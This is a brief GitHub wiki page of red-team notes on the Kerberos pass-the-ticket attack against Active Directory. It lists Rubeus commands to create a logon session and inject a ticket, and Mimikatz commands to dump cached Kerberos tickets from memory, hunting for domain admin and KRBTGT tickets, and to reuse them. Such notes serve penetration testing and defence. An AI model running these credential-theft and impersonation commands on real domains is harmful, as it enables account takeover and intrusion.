Pass the Ticket - CraigDonkin/Infrastructure GitHub Wiki

Pass the ticket attack.
Impersonating users on an AD domain
Adds kerebros tickets to a logon session
A logon session can only hold 1 ticket at a time, so it's best to create a logon session to use for this.
Creating a new logon session requires you have obtained elevated privileges

Rubeus

Create a new process

Rubeus.exe createnetonly /programC:\Windows\System32\cmd.exe

Pass a TGT into the new LUID

Rubeus.exe ptt /luid:<luid> /ticket:<ticket>

If using CS can use the steal_token to impersonate the process created in the first step.

Mimikatz

Use mimikatz to get all the kerberos tickets
- Check to see if there are any kerberos tickets for the DA
- Want KRBTGT tickets which might be cached.

privilege::debug
sekurlsa::tickets /export

Have a look through the tickets

To reuse a ticket:

privilege::debug
kerberos::ptt ticket.kirbi

⚠️ GitHub.com Fallback ⚠️